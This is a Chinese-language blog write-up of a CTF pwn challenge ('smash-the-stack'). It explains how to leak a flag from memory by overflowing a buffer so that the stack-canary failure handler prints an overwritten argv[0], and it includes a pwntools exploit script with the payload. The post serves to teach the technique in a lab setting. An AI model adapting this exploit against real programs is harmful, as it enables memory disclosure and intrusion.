smashthestack的wp

最新推荐文章于 2022-07-20 20:55:21 发布
最新推荐文章于 2022-07-20 20:55:21 发布
阅读量2.1k 收藏
点赞数
分类专栏: ctf的wp 文章标签: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/78522682
版权

https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了smashthestack这个题目感觉还不错,我把wp分享出来,方便大家学习
smashthestack的要求是:

nc hackme.inndy.tw 7717

Tips: stderr is available, beware of the output

这个题目提示利用错误输出
下面我用ida打开smashthestack这个程序看main函数
image
可以看到这个程序很简单,你输入一些东西如果不会造成缓冲区溢出的话就会把栈中的数据打印出来
先运行一下程序看一下这个程序干了啥
image
再看看程序开启了哪些保护:
image
看到NX enabled是开启了栈不可执行,而且这个程序还有canary保护,但是明显的是flag已经被读入了内存,在网上找到了dragonsector写的一个pdf:http://j00ru.vexillium.org/blog/24_03_15/dragons_ctf.pdf,知道了当__stack_check_fail时,会打印出正在运行中程序的名称,所以,我们只要将__libc_argv[0]覆盖为flag的地址就能将flag打印出来
首先找flag的地址,在程序的读完文件的地方下断点0x08048434
image
执行完read指令之后在ecx中发现flag的地址为:0x804a060
image
知道这样的地址之后,就可以写exp了 

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'niexinming'

from pwn import *
context(terminal = ['gnome-terminal', '-x', 'sh', '-c'], arch = 'i386', os = 'linux', log_level = 'debug')

def debug(addr = '0x80484a5'):
    raw_input('debug:')
    gdb.attach(io, "b *" + addr)



#fd:0x804a060

#io = process('/home/h11p/hackme/smash-the-stack')

io = remote('hackme.inndy.tw', 7717)

#payload = p32(0x804a060)+p32(0x120)
payload=p32(0x1)+"a"*184+p32(0x804a060)


#debug()
io.recvuntil('Try to read the flag\n')
io.send(payload)
io.recvall()
#io.interactive()

io.close()

效果是:
image

niexinming
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Smashing The Stack
lyc
10-29 783
Smashing The StackReferenceSmashing the stack在许多C语言的实现中,有可能通过写入程序中所声明的数组的结尾部分来破坏可执行的堆栈.践踏堆栈使用的代码可以造成程序的返回异常,从而跳到任意的地址.这导致了一些极为
险恶的数据相关漏洞(已人所共知).其变种包括堆栈垃圾化(trash the stack),堆栈乱写(scribble the stack),堆栈毁坏
smash-the-stack wp
zszcr的博客
04-02 374
题目提示:stderr is available, beware of the output拿到题目惯例检查下防护机制:发下开启了NX和Canary 两个防护机制结合题目给的提示 ,可以大胆的猜测这是一个smashesattck通过Canary 的防护机制泄露信息ida反编译观察程序逻辑发现它打开了flag文件,所以我们可以将程序的argv[0]覆盖成flag地址来输出flag原理:程序开启了Ca...
JarvisOJ PWN smashes WP
苗_的博客
01-15 352
Smashes 涉及到一些新的知识,以下为转载大佬的一篇博客: 这道题利用是保护机制本身的一种漏洞: 在程序加了canary保护之后,如果我们读取的buffer覆盖了对应的值时,程序就会报错,而一般来说我们并不会关心报错信息。 而stack smash技巧则就是利用打印这一信息的程序来得到我们想要的内容。 这是因为在程序发现canary保护之后,如果发现canary被修改的话,程序就会执行_...
hackme pwn smash-the-stack [stack smash]
ACdream
02-07 313
根据提示:stderr!和32C3的readme一样,原理看上篇,这里贴两个exp #! /usr/bin/env python # coding=utf-8 from pwn import * #io = process('./smash-the-stack') io = remote('hackme.inndy.tw', 7717) argv_addr = 0xffffcfa4 buf...
Smashing the Stack
12-16
stack for program ppt 函数调用时stack的变化
Wp.rar_wp
09-14
标题中的"Wp.rar_wp"可能是指一个名为"Wp"的RAR压缩文件,后缀"_wp"可能是用户为了标记或区分该文件而添加的自定义标识。这个压缩包内容与但丁滤波器设计有关,是一种在信号处理领域广泛应用的技术。 在描述中提到...
WPInternals
11-06
WPInternals是国外网友开发的一款能够获取Win10手机系统Root权限的Win10手机Root解锁工具,并且能够在解锁引导程序后创建和刷自定义ROM的工具Windows Phone Internals,这款工具为刷机提供了便利。
封面应用WP7
04-02
这是封面应用WP7源码,也是Windows Phone 7封面应的一个实例,可以实现项目演示影片效果,和一些书籍等封面效果,该界面不但可以实现左右滚动,而且效果很不错,喜欢wp开发的朋友可以下载学习一下。
mingyue.exe wp
最新发布
03-08
标题中的"mingyue.exe wp"可能是指一个特定的程序或者命令行操作,但没有足够的上下文来详细解释它的具体含义。不过,我们可以基于提供的描述和标签内容来探讨一些相关的IT知识点。 首先,标签"wp"可能是...
wp实现一键锁屏功能
04-04
WP8的时候,关于如何关闭屏幕,国内外都有不少文章了,大家有兴趣地可以搜搜,很多,我就不给链接了,因为稍后我的例子中会有。 其实,关闭屏幕是调用了未开放的API,正因为这个API未开放的,不敢保证所有机型都能...
Wargames:io.smashthestack Level 2
请善待每一个被你欺负过的管理员 >_<
07-29 848
第二关,提供了2种通关方式。
Smash The Stack Wargame IO Level 01-04
PuziのPwn
07-23 442
Ref:http://smashthestack.org/ Dat:20140707
Wargames:io.smashthestack Level 1
请善待每一个被你欺负过的管理员 >_<
07-29 710
我又开始刷题了。 第一关: 给定了一个
好好说话之Stack smash
hollk’s blog
07-28 1934
Stack smash 我们之前一直没有做过关于canary保护的题,那么这个Stack smash就是绕过canary保护的技术。在程序加载了canary保护之后如果我们是在覆盖缓冲区的时候就会连带着覆盖了canary保护的cookie,这个时候程序就会报错。但是这个技术并不在乎是否报错,而是在乎报错的内容。stack smash技巧就是利用打印这一信息的程序来得到我们想要的内容。这是因为在程序启动canary保护之后,如果发现canary被修改的话就会执__stack_chk_fail函数来打印argv
171119 Pwn-StackSmash
whklhhhh的博客
11-24 976
1625-5 王子昂 总结《2017年11月19日》 【连续第415天总结】 A. pwn-StackSmash B.原理当程序加了Cannary来保护时,栈溢出会使得程序异常终止并输出错误信息 StackSmash就是利用这个错误信息进行任意地址读取的 报错函数为__stack_chk_fail,代码如下:void __attribute__ ((noreturn)) __stack_c
Phrack安全杂志:详细分析堆栈溢出Smashing The Stack For Fun And Profit(Aleph One) 关于粉碎堆栈的秘密
「鸿渐之翼」的博客
08-14 1038
致敬:Aleph One 原文首发于Phrack,这是全球第一篇讲述堆栈漏洞的文章,里面提供了学习二进制安全的方法和基础理论知识,详细的描述了栈溢出的原理是什么?这里首次提到function prolouge 和 function epilogue,什么是Stack ?什么是Bufferoverflow?本文献给所有安全行业的研究者和贡献者,由于译者水平有限,翻译与原文内容稍有不同,请谅解。博主希望用质朴的语言展示二进制安全技术,让二进制安全进入大众视野。本文的实例全部可以在Linux平台上复现出来,文章.
hackme inndy pwn stack writeup
charlie_heng的专栏
01-02 477
这题看起来很恐怖,所有保护都开了,但是其实并没有想象中难 这题先pop 两次,再push回去一个,然后再push下标,就可以直接绕过canary,把ret的地址给leak出来 再减去libc里面的__libc_start_main偏移,再把低三位给清零就得到libc基址 之后就是常规rop了,这里直接执行system(‘/bin/sh’) 下面就是利用的代码 from pwn imp...
[BUUCTF]wdb2018_guess——Stack smash技巧
zyxx_wjc的博客
07-20 411
stack smash
[转载]Smashing The Stack For Fun And Profit
weixin_30916125的博客
07-23 278
[转载]Smashing The Stack For Fun And Profit .oO Phrack 49 Oo. Volume Seven, Issue Forty-Nine ...
WPRobot使用全攻略:打造WordPress自动采集博客
"wprobot使用教程 - 一个关于如何使用WPRobot在WordPress中进行自动采集和内容更新的教程,包括伪原创处理等方法。作者金龙分享了他的学习成果和一系列相关工具的使用教程。" WPRobot是一款广泛应用于WordPress的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值